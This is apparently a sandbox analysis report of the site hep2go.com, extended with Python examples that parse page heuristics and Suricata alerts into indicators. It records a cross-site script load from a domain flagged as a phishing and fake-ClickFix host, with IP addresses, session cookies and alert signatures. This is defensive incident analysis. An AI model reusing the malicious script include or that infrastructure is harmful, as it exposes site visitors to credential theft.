

Windows Analysis Report
http://hep2go.com

Overview

General Information

Sample URL: http://hep2go.com
Analysis ID: 1615208

Detection

Score: 56
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Detected non-DNS traffic on DNS port
Stores files to the Windows start menu directory
Suspicious form URL found

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1968,i,18123290374646496901,1641604594129139991,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://hep2go.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-14T16:40:52.683611+0100 | 2059941 | 1 | Exploit Kit Activity Detected | 192.168.2.16 | 53029 | 1.1.1.1 | 53 | UDP
2025-02-14T16:40:52.683769+0100 | 2059941 | 1 | Exploit Kit Activity Detected | 192.168.2.16 | 54003 | 1.1.1.1 | 53 | UDP
2025-02-14T16:40:56.839008+0100 | 2059941 | 1 | Exploit Kit Activity Detected | 192.168.2.16 | 57485 | 1.1.1.1 | 53 | UDP
2025-02-14T16:40:56.839384+0100 | 2059941 | 1 | Exploit Kit Activity Detected | 192.168.2.16 | 58245 | 1.1.1.1 | 53 | UDP
2025-02-14T16:40:53.993019+0100 | 2059942 | 1 | Exploit Kit Activity Detected | 192.168.2.16 | 49733 | 103.52.144.214 | 443 | TCP
2025-02-14T16:40:59.133853+0100 | 2059942 | 1 | Exploit Kit Activity Detected | 192.168.2.16 | 49752 | 103.52.144.214 | 443 | TCP
2025-02-14T16:41:03.259825+0100 | 2059942 | 1 | Exploit Kit Activity Detected | 192.168.2.16 | 49780 | 103.52.144.214 | 443 | TCP
2025-02-14T16:41:07.639997+0100 | 2059942 | 1 | Exploit Kit Activity Detected | 192.168.2.16 | 49818 | 103.52.144.214 | 443 | TCP


AV Detection

Source: https://cta.berlmember.com/google/jquery.php | Avira URL Cloud: Label: phishing
Source: https://www.hep2go.com/ | HTTP Parser: Form action: https://www.hep2go.com/login.php?userRef=gciaake
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaake | HTTP Parser: Form action: https://www.hep2go.com/login.php?userRef=gciaake
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaake | HTTP Parser: <input type="password" .../> found
Source: https://www.hep2go.com/ | HTTP Parser: No favicon
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaake | HTTP Parser: No favicon
Source: https://www.hep2go.com/ | HTTP Parser: No <meta name="author".. found
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaake | HTTP Parser: No <meta name="author".. found
Source: https://www.hep2go.com/ | HTTP Parser: No <meta name="copyright".. found
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaake | HTTP Parser: No <meta name="copyright".. found
Source: chrome.exe | Memory has grown: Private usage: 13MB later: 27MB
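The HTTP Parser entries above are static heuristics over the fetched HTML: where the login form posts, whether a password field is present, and whether the page carries a favicon or author/copyright metadata. The Python below re-implements those checks and adds the one this report's traffic makes most relevant, a script included from a second site. It is an added example, not Joe Sandbox's detector, and the HTML it parses is a constructed stand-in that reproduces the features the report lists for the hep2go.com login page, not the real page source. The form action here is same-origin, as the report shows, so on its own it is a weak signal; the cross-site script from cta.berlmember.com, the URL Avira labels as phishing, is the stronger one.

```python
"""Static page heuristics of the kind a sandbox reports under 'HTTP Parser'.

Added example, not Joe Sandbox code. CONSTRUCTED_LOGIN_PAGE is a stand-in
built from the features the report lists; it is not the real page source.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

CONSTRUCTED_LOGIN_PAGE = """
<html><head><title>Log in</title>
<script src="/javascript/jquery-1.11.3.min.js"></script>
<script src="https://cta.berlmember.com/google/jquery.php"></script>
</head><body>
<form action="https://www.hep2go.com/login.php?userRef=gciaake" method="post">
  <input type="text" name="user"/>
  <input type="password" name="pass"/>
  <input type="submit" value="Log in"/>
</form>
</body></html>
"""


class PageFeatures(HTMLParser):
    """Collect only the attributes the heuristics need."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.scripts, self.metas, self.links = [], [], [], []
        self.password_inputs = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None for bare attributes
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        elif tag == "meta":
            self.metas.append((a.get("name") or "").lower())
        elif tag == "link":
            self.links.append((a.get("rel") or "").lower())


def registrable_part(host: str) -> str:
    """Crude eTLD+1 (last two labels). Fine for .com; wrong for co.uk-style suffixes."""
    return ".".join(host.lower().split(".")[-2:])


def analyse(page_url: str, html: str) -> dict:
    p = PageFeatures()
    p.feed(html)
    site = registrable_part(urlsplit(page_url).hostname or "")
    findings = {}
    # 1. Form action: an absolute URL on another site is the classic phishing tell.
    #    An empty action resolves to the page itself, which is what browsers do.
    actions = [urljoin(page_url, act) for act in p.form_actions]
    findings["form_actions"] = actions
    findings["cross_site_form"] = [
        u for u in actions if registrable_part(urlsplit(u).hostname or "") != site
    ]
    # 2. A password field on a page reached through an untrusted link.
    findings["password_inputs"] = p.password_inputs
    # 3. No favicon and no author/copyright meta: weak but cheap signs of a cloned page.
    findings["no_favicon"] = not any("icon" in rel for rel in p.links)
    findings["no_meta_author"] = "author" not in p.metas
    findings["no_meta_copyright"] = "copyright" not in p.metas
    # 4. A script from a different site can read the credentials as they are typed,
    #    whatever the form action says.
    findings["cross_site_scripts"] = [
        urljoin(page_url, s) for s in p.scripts
        if registrable_part(urlsplit(urljoin(page_url, s)).hostname or "") != site
    ]
    return findings


if __name__ == "__main__":
    report = analyse("https://www.hep2go.com/log-in-2.php?userRef=gciaake",
                     CONSTRUCTED_LOGIN_PAGE)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run against a real capture, feed it the HTML body the sandbox saved for each document request and the URL that request was made to; the relative-URL handling depends on passing the right page URL.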

Networking

Source: Network traffic | Suricata IDS: 2059941 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in DNS Lookup (cta .berlmember .com) : 192.168.2.16:53029 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059941 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in DNS Lookup (cta .berlmember .com) : 192.168.2.16:54003 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059942 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in TLS SNI (cta .berlmember .com) : 192.168.2.16:49733 -> 103.52.144.214:443
Source: Network traffic | Suricata IDS: 2059941 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in DNS Lookup (cta .berlmember .com) : 192.168.2.16:57485 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059941 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in DNS Lookup (cta .berlmember .com) : 192.168.2.16:58245 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059942 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in TLS SNI (cta .berlmember .com) : 192.168.2.16:49752 -> 103.52.144.214:443
Source: Network traffic | Suricata IDS: 2059942 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in TLS SNI (cta .berlmember .com) : 192.168.2.16:49780 -> 103.52.144.214:443
Source: Network traffic | Suricata IDS: 2059942 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in TLS SNI (cta .berlmember .com) : 192.168.2.16:49818 -> 103.52.144.214:443
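The Suricata lines above are the report's own rendering of Emerging Threats alerts, with the domain defanged by spaces before each dot. The Python below, added here as an example and not part of Joe Sandbox or the ET ruleset, parses lines in that format back into records and collapses them into the two indicators worth acting on: the refanged domain, and the IP:port the host actually reached with that name in the TLS SNI. The four input lines are copied from this report; the regexes and the output structure are this example's own.

```python
"""Turn a sandbox report's Suricata alert lines into a small IOC set.

Added example, not Joe Sandbox or Emerging Threats code. REPORT_LINES are
copied from the report; the parsing and grouping logic is this example's.
"""
import re
from collections import defaultdict
from typing import Optional

REPORT_LINES = """\
Source: Network traffic | Suricata IDS: 2059941 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in DNS Lookup (cta .berlmember .com) : 192.168.2.16:53029 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059942 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in TLS SNI (cta .berlmember .com) : 192.168.2.16:49733 -> 103.52.144.214:443
Source: Network traffic | Suricata IDS: 2059941 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in DNS Lookup (cta .berlmember .com) : 192.168.2.16:54003 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059942 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in TLS SNI (cta .berlmember .com) : 192.168.2.16:49752 -> 103.52.144.214:443
""".splitlines()

# "Suricata IDS: <sid> - Severity <n> - <msg> : <src>:<sport> -> <dst>:<dport>"
ALERT_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d+) - (?P<msg>.+?)"
    r" : (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)
# The ET message ends with the matched name in parentheses, e.g. "(cta .berlmember .com)".
DOMAIN_RE = re.compile(r"\(([^()]+)\)\s*$")


def refang(defanged: str) -> str:
    """Undo the report's defanging: 'cta .berlmember .com' -> 'cta.berlmember.com'."""
    return re.sub(r"\s+\.", ".", defanged).strip().lower()


def parse_alert(line: str) -> Optional[dict]:
    """One report line -> dict, or None if the line is not a Suricata alert."""
    m = ALERT_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    for key in ("sid", "sev", "sport", "dport"):
        rec[key] = int(rec[key])
    dm = DOMAIN_RE.search(rec["msg"])
    rec["domain"] = refang(dm.group(1)) if dm else None
    return rec


def extract_iocs(lines):
    """Group alerts by domain.

    A 'DNS Lookup' alert only says the host asked for the name and which
    resolver it asked; a 'TLS SNI' alert gives the endpoint it then connected
    to with that name, which is the indicator to block at the network edge.
    """
    iocs = defaultdict(lambda: {"sids": set(), "dns_resolvers": set(), "tls_endpoints": set()})
    for line in lines:
        rec = parse_alert(line)
        if rec is None or rec["domain"] is None:
            continue
        entry = iocs[rec["domain"]]
        entry["sids"].add(rec["sid"])
        if "DNS Lookup" in rec["msg"]:
            entry["dns_resolvers"].add(rec["dst"])
        elif "TLS SNI" in rec["msg"]:
            entry["tls_endpoints"].add(f'{rec["dst"]}:{rec["dport"]}')
    return dict(iocs)


if __name__ == "__main__":
    for domain, info in extract_iocs(REPORT_LINES).items():
        print(domain, sorted(info["sids"]), sorted(info["tls_endpoints"]))
```

The DNS alerts all go to 1.1.1.1, the resolver, so the resolver address is kept separate from the TLS endpoint and is not itself an indicator.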
Source: global traffic | TCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53 (the same flow is logged 11 times). This is the only TCP flow to port 53 in the report and therefore the likely trigger for the "Detected non-DNS traffic on DNS port" signature. TCP/53 is also a legitimate DNS transport, used for answers too large for UDP, so confirm from the pcap payload that the stream is not DNS before treating it as tunnelling.
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 (7 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 (8 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.77.188 (3 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 (7 times)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172 (4 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 40.126.32.136 (2 times)
1.1.1.1 is the resolver this host uses (the DNS-lookup alerts above are all addressed to 1.1.1.1:53), so the UDP entries for it are the DNS queries themselves rather than a separate finding.
Source: global traffic | HTTP traffic detected. One request per line; headers common to every request are factored out: HTTP/1.1, Connection: keep-alive, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36, Accept-Encoding: gzip, deflate, br, Accept-Language: en-US,en;q=0.9 (the single request to Host: hep2go.com sends Accept-Encoding: gzip, deflate and no Sec-Fetch headers). "ua-ch" marks requests that also send sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117", sec-ch-ua-mobile: ?0, sec-ch-ua-platform: "Windows". Accept values: A-doc = text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; A-img = image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8; A-any = */*. Cookie sets: C1 = PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; C2 = C1; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; C3 = C2; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0. Referer "login page" = https://www.hep2go.com/log-in-2.php?userRef=gciaake.

Request | Host | Client hints | Accept | Sec-Fetch site/mode/dest | Referer | Cookie
GET / | www.hep2go.com | ua-ch | A-doc | none/navigate/document, Sec-Fetch-User: ?1, Upgrade-Insecure-Requests: 1 | none | none
GET /javascript/jquery-1.11.3.min.js | www.hep2go.com | ua-ch | A-any | same-origin/no-cors/script | https://www.hep2go.com/ | C1
GET /javascript/user_ref.001.js | www.hep2go.com | ua-ch | A-any | same-origin/no-cors/script | https://www.hep2go.com/ | C1
GET /include/obj.js | www.hep2go.com | ua-ch | A-any | same-origin/no-cors/script | https://www.hep2go.com/ | C1
GET /javascript/cart.001.js | www.hep2go.com | ua-ch | A-any | same-origin/no-cors/script | https://www.hep2go.com/ | C1
GET /javascript/scripts.002.js | www.hep2go.com | ua-ch | A-any | same-origin/no-cors/script | https://www.hep2go.com/ | C1
GET /javascript/user_ref.001.js | www.hep2go.com | none | A-any | none/cors/empty | none | C1
GET /include/obj.js | www.hep2go.com | none | A-any | none/cors/empty | none | C1
GET /javascript/scripts.002.js | www.hep2go.com | none | A-any | none/cors/empty | none | C1
GET /javascript/cart.001.js | www.hep2go.com | none | A-any | none/cors/empty | none | C1
GET /javascript/jquery-1.11.3.min.js | www.hep2go.com | none | A-any | none/cors/empty | none | C1
GET /images/try-it-out-over-3.jpg | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | https://www.hep2go.com/ | C1
GET /images/log-in-index.jpg | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | https://www.hep2go.com/ | C1
GET /images/sign-up-index.jpg | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | https://www.hep2go.com/ | C1
GET /images/progress.gif | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | https://www.hep2go.com/ | C1
GET / | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | https://www.hep2go.com/ | C1
GET /ajax/ur_get_user_name.php | www.hep2go.com | none | A-any | none/cors/empty | none | C1
GET /google/jquery.php | cta.berlmember.com | ua-ch | A-any | cross-site/no-cors/script | https://www.hep2go.com/ | none
GET /images/log-in-index.jpg | www.hep2go.com | none | A-any | none/cors/empty | none | C1
GET /ajax/logout_get_id.php?userRef=gciaake | www.hep2go.com | none | A-any | none/cors/empty | none | C1
GET /images/progress.gif | www.hep2go.com | none | A-any | none/cors/empty | none | C1
GET /images/sign-up-index.jpg | www.hep2go.com | none | A-any | none/cors/empty | none | C1
GET /images/try-it-out-over-3.jpg | www.hep2go.com | none | A-any | none/cors/empty | none | C2
GET /favicon.ico | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | https://www.hep2go.com/ | C3
GET /google/jquery.php | cta.berlmember.com | none | A-any | none/cors/empty | none | none
GET / | hep2go.com | none | A-doc | no Sec-Fetch headers, Upgrade-Insecure-Requests: 1 | none | none
GET /log-in-2.php?userRef=gciaake | www.hep2go.com | ua-ch | A-doc | same-origin/navigate/document, Sec-Fetch-User: ?1, Upgrade-Insecure-Requests: 1 | https://www.hep2go.com/ | C3
GET /javascript/scripts.002.js?rnd=733704651 | www.hep2go.com | ua-ch | A-any | same-origin/no-cors/script | login page | C3
GET /log-in-2.php?userRef=gciaake | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | login page | C3
GET /images/medium-logos/2022-logo-blue-medium.png | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | login page | C3
GET /images/sign-up.jpg | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | login page | C3
GET /images/arrow_down2.gif | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | login page | C3
GET /javascript/scripts.002.js?rnd=733704651 | www.hep2go.com | none | A-any | none/cors/empty | none | C3
GET /google/jquery.php | cta.berlmember.com | ua-ch | A-any | cross-site/no-cors/script | https://www.hep2go.com/ | none
GET /images/medium-logos/2022-logo-blue-medium.png | www.hep2go.com | none | A-any | none/cors/empty | none | C3
GET /images/arrow_down2.gif | www.hep2go.com | none | A-any | none/cors/empty | none | C3
GET /ajax/logout_get_id.php?userRef=gciaake | www.hep2go.com | none | A-any | none/cors/empty | none | C3
GET /images/login.jpg | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | login page | C3
GET /ajax/ur_get_user_name.php | www.hep2go.com | none | A-any | none/cors/empty | none | C3
GET /images/sign-up.jpg | www.hep2go.com | none | A-any | none/cors/empty | none | C3
GET /images/login.jpg | www.hep2go.com | none | A-any | none/cors/empty | none | C3
GET /buttons/left_buttons/pend_over.jpg | www.hep2go.com | ua-ch | A-img | same-origin/no-cors/image | login page | C3
Source: global trafficHTTP traffic detected: GET /google/jquery.php HTTP/1.1Host: cta.berlmember.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /buttons/left_buttons/pend_over.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /ajax/get_users.php HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global traffic | DNS traffic detected: DNS query: hep2go.com
Source: global traffic | DNS traffic detected: DNS query: www.hep2go.com
Source: global traffic | DNS traffic detected: DNS query: cta.berlmember.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: unknown | HTTP traffic detected: POST /ajax/ur_get_user_name.php HTTP/1.1 | Host: www.hep2go.com | Connection: keep-alive | Content-Length: 15 | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | Accept: application/json, text/javascript, */*; q=0.01 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | X-Requested-With: XMLHttpRequest | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Origin: https://www.hep2go.com | Sec-Fetch-Site: same-origin | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Referer: https://www.hep2go.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 14 Feb 2025 15:40:57 GMT | Server: Apache | Expires: Thu, 19 Nov 1981 08:52:00 GMT | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | Pragma: no-cache | Connection: close | Transfer-Encoding: chunked | Content-Type: text/html
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58134
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58132
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 58132 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown | Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 58134 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engine | Classification label: mal56.win@18/24@15/175
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
